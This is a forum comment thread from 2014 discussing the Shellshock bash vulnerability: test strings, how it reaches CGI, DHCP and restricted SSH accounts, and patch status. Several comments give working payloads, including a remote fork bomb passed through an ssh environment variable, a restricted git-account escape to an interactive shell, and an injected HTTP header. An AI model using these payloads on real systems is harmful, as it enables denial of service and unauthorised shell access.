On the system I tested, I do get a segfault but only after it has run the command. It's definitely not limited to built-in commands; "/usr/bin/man bash" worked just fine.

Re:Test string here:

[RLiegh]

I updated Linux Mint x86 and tried it:

rl@home ~ $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test
rl@home ~ $

I'm gonna assume that means the version they just pushed out is fixed...

Re:Test string here:

[ArsenneLupin]

Or, more easily: the exploit string could be packed into the TERM variable, which almost all ssh's and even telnet daemons pass on the the shell: env TERM='() { :;}; echo vulnerable ssh some_user@some_server'

Re:Test string here:

[Dagger2]

SSH can be configured to lock down which commands the user can run; this is common in combination with e.g. gitolite for letting people push to a git repository without giving them full shell access. Anybody with access to such a server can now run arbitrary local commands

Re:Test string here:

[McKing]

Even if you are running homebrew's bash as your current shell, your command is just calling "bash" and not "/usr/local/bin/bash". I suspect that your PATH has /bin before /usr/local/bin. Try this instead:

env x='() { :;}; echo vulnerable' /usr/local/bin/bash -c "echo this is a test"

Re:Test string here:

[jeremyp]

Suppose you are a guest at my house and you want to ssh into your own computer at your house. I say no problem and I create you a user account on my computer which you then use to ssh to your computer.

Still don't think it's a problem?

Of course I could also have a key logger installed.

Re:Test string here:

[chihowa]

All of the networking functions are performed by native tools, but I'm not sure of the details. As a fingers-crossed-with-rescue-media-ready experiment, OS X seems to run normally with all of the shells removed (except the terminal and my own scripts, of course).

Re:Test string here:

[RavenLrD20k]

If it outputs:

bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
This is a test

or just

This is a test

then your server is patched successfully. Whether or not the error message displays depends on bash configuration. I have three CentOS 6.5 servers that I manage in my house and one in the cloud. On the 3 64-bit machines which were original installs it generates the error message after patching. On the 1 32-bit machine which was upgraded from a previous version of CentOS I just get the "This is a test" message with no error after patching.

The idjit part of the statement is running CGI scripting on an exposed web server. It was also done mostly tongue in cheek, hence the deliberate misspelling of idiot. The reason for this statement is that it can be easily inferred that since he's (presuming male from the 'Lord' in his handle) directly able to administer a router, either this server is production for a business, or he's at home.

If it's the former, all sympathy goes out the window as well as the tongue in cheek intent since he's getting paid to administer these systems and keep them secure; which also means that he should know how to patch bash even if his distro provider hasn't put the patch in their upstream. A production server is that important.

On the other hand, if it's the latter, a greater deal of leeway can be given, and we can safely assume he's a hobbyist. In this case, it would be prudent for him to turn this into a learning situation. First, yes, take down port 80. Second, if your distro doesn't have the patch in the upstream yet, this would be a good opportunity to learn how to patch by hand. The tarball can be downloaded from the gnu.org site (not giving a direct link since the point of a hobbyist server is to perform your own research). Read the documentation to learn how to manually install the patch. Once your system is patched and you pass the test, you can open up port 80 again. Finally, you'll want to learn other options to processing your forms or dynamic pages than relying on CGI scripting. It's an old methodology that leaves your machine open to a host of problems, as is evident by this shellshock vulnerability.

On a final note: I guess I'm just old now, but way back when I was using Redhat 5, whenever I needed to patch something on my box that I'd dial in on I wouldn't normally wait on the Distro's upstream, but instead install the source project myself. Not only did this keep my systems current, but it also helped me with my understanding of that system and every way that it operated. There's just a whole lot of understanding that seems to get lost when you're not dealing with levels low enough.

Re:Test string here:

[Darinbob]

Note that if you use "bash -r -c" instead that you get a restricted shell (ie, more secure) and you don't get the vulnerability.
Although I don't think there's a portable way to get a restricted shell with all shells out there (dash doesn't seem to have that ability), so things that want to execute a subshell to execute commands are in a pickle, either use the default shell with no restricted option or know which type of shell is being used underneath the hood.

Re:Test string here:

[TheCarp]

Yes but the intent wasn't to exploit so much as to have a way to raise a flag when connecting to a vulnerable system, so as to know it still needs updating.

Really? Using bash for CGI?

All the systems I've done security pen tests against that were using bash for CGI were so easy to hack via other means it wasn't funny. And of course that web server CGI was running as root so root shell and done.

Stop using Bash for CGI unless you want to get pwned. Similar theme with 90% of the Perl CGI I run into.

Terminal vulnerabilities

[Dimwit]

My favorite of this sort of thing is CVE-2009-1717, which was a bug in Apple's terminal emulator in Mac OS X. Sending certain escape sequences to it caused it to blow up and potentially execute code. What was fun is that putting a "telnet://" link in a web page would automatically cause Mac OS X to automatically open a terminal and connect to a remote host with no prompting by the user. It was a pretty neat vulnerability.

Re:You mean bash.org ?

[Dracos]

Has Netcraft unconfirmed the death?

Exploit depends on not validating input?

[h4ck7h3p14n37]

Someone correct me if I'm mistaken, but doesn't this exploit depend on programs not validating input?

The example given in the post to oss-security mentions HTTP request headers containing malicious data being passed into CGI programs which then call out to Bash. Wouldn't taint-checking input eliminate that attack vector?

Re:Exploit depends on not validating input?

[Qzukk]

It's not being passed in as usual data, it's being passed in as environment variables, most programmers ignore all the variables that are not relevant to their program (which is usually all of them).

Re:Exploit depends on not validating input?

[artbristol]

Someone correct me if I'm mistaken, but doesn't this exploit depend on programs not validating input?

Yes, but the program failing to validate the input is bash itself. Not your code.
As soons as you get to #!/bin/bash you're exploited. Doesn't matter how careful your script code is.

This is really, really bad. Does your home router have any cgi scripts that use bash? This remote exploit can be triggered with a query parameter.

Re:Exploit depends on not validating input?

[Bacon+Bits]

When httpd runs a CGI script, it passes data to the script with bash environment variables. That means the code would be executed by httpd in whatever context it runs CGI scripts. The CGI script itself hasn't even been executed yet.

Re:Exploit depends on not validating input?

[nabsltd]

Does your home router have any cgi scripts that use bash?

Even if it did, it only serves web pages to IPs on the "LAN" side, right?

If not, you've already been pwned long ago.

Re:Exploit depends on not validating input?

[eneville]

blessed are the pessimist for they set -i.

Re:Exploit depends on not validating input?

[eneville]

er, env -i is what i meant

Re:Maybe it has to do with spelling

[Dracos]

Because MS hates standards. Their first vowel for exploitable software is 'i'. If you think that doesn't hold up, prepend Microsoft or Windows.

would the "is fixed because i use something else"

[rewindustry]

clowns please pipe down.

this seems a simple error to actually fix, so why is everybody fapping off about this thing, and not fixing it?

or did i miss the patch?

i'm actually hoping for a reply here, sorry if i missed the meeting, otherwise will be applying my own patch, very quickly.

i rely on bash and it's isms, it's a good thing, and ought to be more of a standard.

http CGI scripts? Did I get stuck in 1996?

[Vellmont]

So far, HTTP requests to CGI scripts have been identified as the major
attack vector.

Umm.. who still does that? That sounded wonky, risk-prone, and a hack in the mid 90s. Who's still using CGI scripts to execute shell code?

Re:Maybe it has to do with spelling

[gstoddart]

Flash... Java... Bash. They all have the letter 'a' in them as their first vowel.

I think it's a conspiracy by the first letter of the english alphabet.... Yup, that must be it.

Oh wait.... "Windows". Hmm... that doesn't fit the pattern at all, does it?

Well, that's OK. i is like a for large enough values of a (or really small values of i).

And depending on what part of the world you're in, the sound of vowels can change quite a bit.

A few years back, my wife's mother and some friends were in the southern US ... she walked into the store and asked if they have any pins ... the cashier asked if she "wanted a ball point pin or a fountain pin". I kid you not.

In fact, my wife had an economics prof from Texas once. There was no discernible difference between the sound of "microeconomics" and "macroeconomics", because apparently a and i have the same value there.

Therefore, in Texas, your statement is 100% true. ;-)

format C:

[rewindustry]

(nt)

Re:Linux is just a full of holes as Windows

[armanox]

Yes, because it's not a Linux hole. GNU Bash is the vulnerable software. So if you have Bash installed, you're vulnerable (I'm about to test the vulnerability myself).

git@ shell accounts using gitolite and gitosis

[paskie]

You can get shell on git@ accounts set up with gitolite and gitosis, at least some of their versions will use /bin/bash as the login shell (and only use ~/.ssh/authorized_keys to restrict the commands). One easy way to check whether your git server account is vulnerable:

ssh git@yourgitserver '() { echo $1; }; /usr/bin/id'

Re:git@ shell accounts using gitolite and gitosis

[shitner]

Even better, if you have an access to git server you can do:
ssh git@gitserver '() { echo $1; }; /bin/bash'
and you get an interactive bash session.

wtf

[drinkypoo]

Who does CGI with anything but a restricted shell these days? And should we shoot them now, or after they fix their scripts?

Re:wtf

[iggymanz]

it affects other things than CGI, remote services that call bash for example: dhcp client being one listed in Redhat's CVE page

so a remote fork bomb is possible?

[Killer+Instinct]

VAR=() { ignored; }; : :(){ :|:& };:

Re:so a remote fork bomb is possible?

[multiplexo]

Yes, run this:

env LC_BOMB='() { :;}; :(){ :|:& };:' ssh some_user@some_system

And if some_user is using bash and the ssh daemon on the system is configured with AcceptEnv LC_*, which most of them are, you'll end up with an awesome remote fork bomb.

Re:so a remote fork bomb is possible?

[rdnetto]

For that specific case, it does require SSH access.
However, SSH access is often used for protocols like git, which makes this rather problematic.
Additionally, the vulnerability is just as effective using the CGI variables via apache.

You just got bashed

[acscott]

The environment bashes you for 99 Hit Points! You are dead.

Re:environmental?

[peter.kingsbury]

Obviously you've never used Linux in the wild.

You are mistaken. No input processing needed

[raymorris]

> Someone correct me if I'm mistaken, but doesn't this exploit depend on programs not validating input?

Suppose you have pwd.cgi, which prints the name of the current directory:

#!/bin/sh
echo -e "Content-type: text/plain\n\n"
pwd

Notice the script uses no input at all. It is potentially vulnerable. Here's why. Suppose you did want to validate your input. You'd look at the contents of $QUERY_STRING, right? You can find what the user entered in the QUERY_STRING environment variable because bash puts it there. That's the step where the problem lies - bash can EXECUTE the contents of the query string while setting the environment variable. This occurs before the user's script even begins to run.

And in Gentoo

[crow]

app-shells/bash-4.2_p47-r1 is not vulnerable. I just updated.

one-liner df.cgi, uptime.cgi

[raymorris]

Many, many sites have one line scripts like this laying around:

#!/bin/sh

echo -e "Content-type: text/plain\n\n"
df -h

Or similarly, a script that just runs pwd or uptime.

Re:one-liner df.cgi, uptime.cgi

[dfsmith]

The package man2html (installed by default on my server) had a cgi script starting #!/bin/sh. Urk.

Re:environmental?

[chipschap]

Why do people say/write "environmental" variable? I've never seen the that word used in shell documentation or any literature on *nix written by competent authorities. It's "environment variable."

It's due to global warming.

Re:Maybe it has to do with spelling

[DeputySpade]

Sure, but what about 'Gates'? ;-)

Not arbitrary variables - QUERY_STRING

[raymorris]

> Oh I had the same thought....I mean, by the time an "attacker" is modifying arbitrary environment variables in your process, well...you are already pretty compromised. If you wrote your CGI, then you are the one that compromised yourself.

The contents of the CGI script don't matter. The exploit occurs before the script runs. It happens as bash is setting up the environment in which the script will be run.

Suppose you have pwd.cgi, which prints the name of the current directory:

#!/bin/sh
echo -e "Content-type: text/plain\n\n"
pwd

Notice the script uses no input at all. It is potentially vulnerable. Here's why. Suppose you did want to validate your input. You'd look at the contents of $QUERY_STRING, right? You can find what the user entered in the QUERY_STRING environment variable because bash puts it there. That's the step where the problem lies - bash can EXECUTE the contents of the query string while setting the environment variable. This occurs before the user's script even begins to run.

Re:Not arbitrary variables - QUERY_STRING

[DahGhostfacedFiddlah]

Thank You, raymorris. I'd read most of the thread and still didn't have a clear idea of the problem.

Re:Not arbitrary variables - QUERY_STRING

[menkhaura]

Setup a local cgi script on your Linux machine. Telnet into its port 80. Assuming your cgi script is at /cgi-bin/test.sh, type the following in the telnet prompt:

GET /cgi-bin/um.pl HTTP/1.1
Host: localhost
Custom: () { :; }; while read -r l; do echo $l; done

Press ENTER twice after the last header.

If you don't use a shell builtin, the shell ends with a segfault and Apache shows an error, but the command is executed server-side. Scary.

Re:Not arbitrary variables - QUERY_STRING

[menkhaura]

Of course, replace um.pl with test.sh; whatever, you get the gist.

Re:Really? Using bash for CGI?

[MSG]

From the CVE, I'm pretty sure the problem isn't limited to CGI written in Bash. The problem affects any CGI that *calls* bash, which means any call to system() in any language is going to cause a problem.

Got the bash update this mawning for my Debian...

[antdude]

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test

$ bash --version
bash --version
GNU bash, version 4.2.37(1)-release (x86_64-pc-linux-gnu)
This is from my Debian stable box.

Is that good or bad? :O

Actually, no, apk

[raymorris]

Actually no, that comment does not explain either of the two key points, a) it happens before script is executed and most importantly b) it therefore is independent of the content of the script.

Nice try though, apk.

Worse than you think.

[slimjim8094]

Almost *ANY* CGI is vulnerable, because the way CGI works is by environment variables. And the attacker can control them. You don't have to be doing anything stupid or wrong to be affected. It looks like other ways of executing web applications (e.g., mod_php) are safe - to the extent that they don't use a popen or a system() or something, which is a pretty common thing to do.

Your DHCP client (on a Linux) machine passes data to its hooks via environment variables. These can be set by the attacker. Even better, it's running as root. Boom, connect to a rogue AP and get rooted while receiving an address assignment.

You probably do Git commits via a (locked-down) SSH login. That's compromised.

Shells are everywhere. Again, this doesn't require your application to have screwed up. This is a flaw in how environment variables are parsed and set, which is something that was presumed safe, so nobody thought about it. Bad bad bad bad. Not Heartbleed bad, but close.

Re:Worse than you think.

[Mirar]

How do android/ios run DHCP?

How do cheap all-in-one ADSL modems run DHCP?

I think that will tell us how bad this is. That's where the worms will live.

Re:Worse than you think.

[EXrider]

Ew that's bad, I also just confirmed that Mac OS X and iOS's DHCP client process (configd) runs as root as well.

Re:Worse than you think.

[EXrider]

iOS and Mac OS both run their DHCP clients in the configd process, which runs as root.

https://developer.apple.com/library/mac/documentation/Darwin/Reference/Manpages/man8/configd.8.html

http://www.opensource.apple.com/source/configd/

Re:Worse than you think.

[EXrider]

As it turns out, configd doesn't make any calls to Bash, so OS X and iOS are safe from DHCP exploits in this case. Also noteworthy, relatively ancient versions of OS X and BSD also don't default to the Bash shell.

http://complexitydaemon.wordpress.com/2014/09/26/bash-os-x-dhcp-and-you/

Re:Remote exploit when it cant be exploited remote

[Megane]

Sure, but anything remote that can set up environment variables before starting bash can exploit it. Lots of idiot programmers like to blindly shell out to do stuff even when there's a simple library function to do things, such as unlink("$path") vs. system("rm $path"). And environment variables have this pesky habit of sticking around when you do that. Environment variables are commonly used with CGI, which is also commonly used with idiot programmers. So while it may be a "local" exploit, that's with unusually large values of "local".

already patched in debian/ubuntu

[LocutusOfBorg1]

Debian and ubuntu have been patched by the security team 4 hours ago (more or less when this article has been written).

Re:already patched in debian/ubuntu

[Mike+Frett]

Yeah this is FIXED already people. It's a non-issue.

Re:already patched in debian/ubuntu

[Mirar]

It's not FIXED in countless of devices (phones, modems, routers) that will not receive an update.

My explanation

[spitzak]

This is bad. The reason is lots of things that use bash put unchecked data into environment variables.

As an example, imagine some cgi wants to test is a string is valid, and somebody wrote a clever bash script that does this check, and reads the string by looking in $INPUT. The cgi takes whatever the user typed on their web form, does setenv("INPUT", text) and then runs the bash script, which uses "$INPUT" at places it wants the text.

No matter how carefully written the bash script is, if the user can type "() { :;}; exploit" into the text field, it will run "exploit". There is no reason for the cgi to test for any syntax errors because that is the job of the bash script!

It seems hard to believe such a bug is possible. It appears that when setting an environment variable, if it is a function, it runs some code that splits the text at semicolons, puts the first section in the environment variable, then runs the rest as shell input! But I can't figure out any reason such code exists. I thought at first it was pasting "export " on the start of the environment line and executing that using the interpreter, but tests show that does not work because it splits at the spaces. And if you add quoting to fix that then it also fixes the semicolon. And it obviously examined the environment variable to see if is a function, because semicolons in non-function ones are handled correctly. So I think bash code might be quite a mess for such a bug to be possible without much more obvious bugs happening...

Re:My explanation

[spitzak]

Well I don't know much bash, so I figured out why this is happening, though it still seems unbelievable.

Apparently the normal way to define a function is to write "x() {...}". But it stores it in an environment variable for some reason, I think so that a recursively called bash gets the same function definition.

To support that, on startup it scans the environment for variables starting with "() {" (spacing must be exactly that). It then defines the function by pasting the variable name onto the start of the variable and interpreting that. And the interpreter splits at the semicolons and executes the remaining text as commands, leading to this bug.

The whole thing looks pretty messy. Certainly it should have been possible to call some lower-level function *after* the interpreter has figured out it is defining a function, and that one would barf on the semicolon. Also you get this interesting and misleading effect:

      $ export x='() { echo WORKS;}'
      $ x
      x: command not found
      $ bash -c x
      WORKS

Their solution is rather annoying because you now cannot set environment variables to all possible byte strings. That sucks. They should have left the environment variable set to the text and not defined the function.

Re:My explanation

[k6mfw]

I don't know bash either (been dabbling on learning to code), I see this headline thinking, "looks like I picked the wrong week to learn about bash."

Re:My explanation

[countach]

The whole idea that any and every environment variable can contain runnable code which would automatically be loaded was pure insanity on somebody's part.

Re:Maybe it has to do with spelling

[iggymanz]

ah but in Texan micro is just two syllables "my-crow" while macro is three "my-yah-crow". Hope that helps.

ok I made that shit up

Re:Got the bash update this mawning for my Debian.

[kthreadd]

That's good. The version number means nothing since Debian backported the fix rather than upgrading bash completely, but the check above didn't say vulnerable so you're clear.

Re:yum: Could not find update match for bash

[sosume]

sudo mv /bin/bash /bin/woosh

Re:Mostly a CGI issue?

[kthreadd]

It's a big issue if you're using locked-down ssh, for example in a git server.

Re:Got the bash update this mawning for my Debian.

[antdude]

Thank you, sir. Good job to Debian team on releasing the fix!

Re:PHP users.

[wimg]

php-fpm uses the fastcgi protocol, which is not the same as cgi and therefor not vulnerable.

sudo aptitude safe-upgrade

[mrflash818]

sudo aptitude update;
sudo aptitude safe-upgrade;

done.

Re:yum: Could not find update match for bash

check your updates repository to make it is enabled and a CentOS official repo.
Even though it often isn't set to enabled, oddly when I put enabled=1 in my .repo file for it, the update was found.

I am wrong but...

[EmperorOfCanada]

Am I wrong but that this exploit only works if you are running CGI scripts? Am I also wrong in thinking that if you are running PHP as an Apache Mod that this exploit doesn't work unless you are executing command line stuff?

Also the SSH aspect seems to be more of a privilege problem whereby someone has to have a valid ssh account before they can start hacking?

I am going to go out on a limb and say, if you are using CGI you are a dumbass and if you give anyone who you can't trust with ssh then you are also a dumbass. I don't think that I have configured a CGI serving machine since last millennia (literally).

Re:I am wrong but...

[HJED]

Anything that uses bash is exploitable, another example of this being used is to gain root through the dhcp client...

Re:I am wrong but...

[Xylantiel]

I think the problem is than any large PHP application is likely to execute something with a shell at some point. Any point is enough. This may slow down exploits, since you have to hunt for the corner case that executes a shell, but not much.

Re:I am wrong but...

[Ankh]

Any program that's called via the CGI interface, regardless of programming language, is potentially vulnerable to this attack, because the Web server puts the environment variables in the process' environment and they'll inherit to sub-processes.

The ssh exploit can be ued to escalate privileges e.g. when used in a limited account such as github or remote CVS or backup.

DHCP is also vulnerable (remotely).

I don't think calling people names is helpful. Anything called via the CGI API is potentially vulnerable, as is anything that passes on environment variables or HTTP headers to sub-processes, regardless of what language was used to write those programs.

/usr/bin/quisuis-je

[tepples]

Would something like this work? "avoir && ln -s /usr/bin/whoami /usr/bin/quisuis-je && quisuis-je"

Re:/usr/bin/quisuis-je

[BlackPignouf]

It's been corrected since, but yes, it would have worked.

Detailed info from RedHat

[Beeftopia]

Example attacks are listed on Red Hat's security blog.

And a follow-up related unfixed bug in bash

[paskie]

I'm sorry, I've meant to link to http://seclists.org/oss-sec/20... (you may want to walk the thread up a bit) and https://bugzilla.redhat.com/sh...

Only underscores the point

[petrus4]

While bash is by far my favourite UNIX shell, I've seen various bits of evidence that have indicated a need for major refactoring, for quite a while now. I would look into it myself, but there is always the risk that whatever changes I proposed would be rejected. Perhaps I should think about creating a fork, although that would be a lot of work.

Re:Only underscores the point

[countach]

Well, the basic idea of bash, sh, or a unix shell is rather crufty. /bin/sh was already crufty what with its weird quoting rules and so forth before bash added all its extensions.

Nobody's really invented something yet as just damned convenient as /bin/sh, but I wish they would.

Re:Linux is just a full of holes as Windows

[runningduck]

Just having Bash installed does not make a system vulnerable. In order for the system to be vulnerable you also need to provide a method for a remote party to pass an environment string to the Bash shell. This would typically be handled via CGI when the web server hands GET and POST data via an environment variable to a Bash script. I do not believe Apache call to Bash for launching a Perl based CGI script so the global attack surface should be pretty small. I do not think I have seen a Bash CGI script since the 90's.

Re: Full Disclosure can be found on oss-security..

[gweihir]

No.

Re:Maybe it has to do with spelling

[gstoddart]

LOL ... I gather it was more like "mah-cro" and "mah-cro".

Who in their right mind ...

[AftanGustur]

... is using bash scripts to generate web content in 2014?

Look, there is a bug, obviously, but to say that it is "remotely exploitable" is a half-truth, and that it is "on level with or worse than heartbleed" is nonsense.

There are a lot of things that need to "line up" in order for this to be remotely exploitable.

Re:Who in their right mind ...

[countach]

All that needs to line up is that there be cgi based bash scripts, which admittedly not everyone has, but plenty of people (for some strange reason) do have. You are underplaying this.

Not vulnerable

[Aethedor]

It seems that the Hiawatha webserver is not vulnerable for this exploit, because it doesn't URL decode environment variables. Wise decision (CGI's seem to work fine without it) or just luck? Is there a standard which says that CGI environment variables should be URL decoded?

Re:Not vulnerable

[Aethedor]

Never mind my previous post. The weblog article has been changed, so the claim of not being vulnerable seems to be false.

Re:Remote? Vulnerability?

[ray-auch]

Two words - dhcp client. Think how it works on Linux.

Re:ksh also vulnerable?

[kthreadd]

Take a look again at the command you just ran. You're still invoking bash.

Re:Really? Using bash for CGI?

[ArsenneLupin]

The problem affects any CGI that *calls* bash, which means any call to system() in any language is going to cause a problem.

Nowadays, on most systems, /bin/sh is a proper Bourne Shell (either ash or dash), and no longer bash. So system() should no longer be an issue, but explicitly calling bash still would be...

Re:Linux is just a full of holes as Windows

[armanox]

I was explaining it to someone (co worker) yesterday as the vulnerability is there, but there needs to be an attack vector open as well. My demo to him was on an SGI system running IRIX - Bash was vulnerable, but without AccetEnv in SSH being enabled or something like Apache CGI the exploit can't be used.

Two reactions

[return+42]

Earlier this week, there was much cursing in Ft. Meade. Today, there is much cackling in Calgary.

Seems fundamentally broken

[countach]

Even if they fix the basic bug, which is that functions are exported as environment variables, but the function can be trailed with extra commands, the whole idea seems extremely dangerous to me. What if you define a function called ls or cp or some other common command? It's pretty likely something will call it, and the whole problem is back in play.

The bigger problem to me seems to be that cgi scripts export user parameters to environment variables before calling bash. I mean, bash itself as a cgi web handler seems incredibly dangerous already. Too powerful for this application. But to then have unvetted user defined environment variables? This is insane. There's plenty of blame to go around here.

Re:Seems fundamentally broken

[jeremyp]

Exactly. This whole feature is ill conceived madness. For one thing it means that if I want an exported legitimate environment variable that starts with parentheses, I can't then use it in a forked bash session.

What were they thinking of?

Re:Seems fundamentally broken

[Ankh]

This is a complete misunderstanding of what is going on.

"The bigger problem to me seems to be that cgi scripts export user parameters to environment variables before calling bash"
No, this is not what it is about at all.

The CGI specification says that the Web server (not CGi scripts) makes HTTP headers and request data available in environment variables.

Programs called through this interface (often called "index.cgi") are vulnerable *regardless* of what language was used to write them, because a lot of programs end up calling bash indirectly. And no, shell functions themselves are not the problem, so redefining cp or ls isn't going to happen in this way, it just happens to be a part of shell syntax with a bug in the parser in bash that also executes commands when it shouldn't.

Re:would the "is fixed because i use something els

[Per+Wigren]

Not updated in Debian Squeeze yet, though.

Re:Maybe it has to do with spelling

[bobaferret]

what really sux, is that for most people, here in the southern part of the US, no matter how much they want to, they can't hear or speak the difference in pen vs. pin. That why we call them stick pins, and not just pins..

In other news...

[sootman]

CMD.EXE -- bulletproof!

ls -alh /bin/sh: /bin/sh - bash

[raymorris]

/bin/sh is frequently a symlink to /bin/bash

# ls -alh /bin/sh
lrwxrwxrwx. 1 root root 4 Sep 24 12:47 /bin/sh -> bash

Re:Linux is just a full of holes as Windows

[Ankh]

It also affects bash scripts called from programs run by CGI, so e.g. Perl, python, C, C++ programs using system(). Since environment variables are inherited by all subprocesses, it affects grandchildren, greatgrandchildren, and all the other sub-processes that get created all the way down.

Some scripting and programming languages use the shell to expand "glob" patterns, e,g,
        $names = glob( "/tmp/[0-9]*" )
or in other places where it may not be obvious.

I'm not interested in comparing numbers of holes in different systems as it ony takes one hole for an intruder to get in.

Re:Remote? Vulnerability?

[ray-auch]

dhclient and dhclient-script

and yes, the target machines in that case would be laptops and mobile devices.

For servers, I have read elsewhere that cPanel at least is vulnerable. Not many servers using that, right ?

Re:aaa

[ray-auch]

Bash 1.14.0, see http://web.nvd.nist.gov/view/v...

So, >20 years

Re:Remote? Vulnerability?

[Ankh]

That you don't understand it doesn't mean it's not real.

Some people run a program called a "Web server" which listens on a network and runs programs based on requests it receives :-)

It's not about using bash for CGI scripts, although that's an obvious example. Some people use languages like Perl or python or even php (in CGI mode), or C, or Pascal, and all of those programs can be affected too, because they might use something like systm() or `...` or run an external program that in turn calls the shell, directly or indirectly.

Other services are also affected - ssh, dhcp, remote git, potentially even ftp and email although that seems less likely.

ksh Version 11/16/88g on SCO 5.0.7 also vunerable

[cslewis2007]

When I execute: env x='() { :;}; echo vulnerable' bash -c "echo this is a test" on ksh under Sco unix 5.0.7 - it outputs vulnerable I'm not sure if ksh on other platforms would also be vulnerable (probably)

Re:ksh Version 11/16/88g on SCO 5.0.7 also vunerab

[cslewis2007]

I'm sorry, I overstated the issue. The command I typed still only exposes the issue in the bash program, not the ksh program. Setting the x=.... function and then invoking bash is an issue, but if you run: env x='() { :;}; echo vulnerable' ksh -c "echo this is a test" you don't see vulnerable, I'm sorry for the confusion.

CVE-2014-7169 has been fixed

[InvisibleSoul]

At least for RedHat/CentOS, CVE-2014-7169 has been patched now as well. https://rhn.redhat.com/errata/...

Not all OSX versions affected

[aNonnyMouseCowered]

"The (ancient) version of bash that ships with OS X appears vulnerable."

Some really ancient versions of OSX shipped not bash but tcsh, which was (is?) the NetBSD default shell. So who's going to write the anti-bash rebuttal to the famous "Top Ten Reasons not to use the C shell": http://www.grymoire.com/unix/C...

Re:When was this bash bug introduced?

[kthreadd]

It's been in there since Bash 1.4.

Re: Full Disclosure can be found on oss-security..

[GameboyRMH]

Nope can't find any evidence that iPhones ship with a full bash install, but they do have the capability to run some bash commands.

Re: Full Disclosure can be found on oss-security..

[Optali]

IIF the CGI script is bash based... and WTF do you mean by "binaries" ?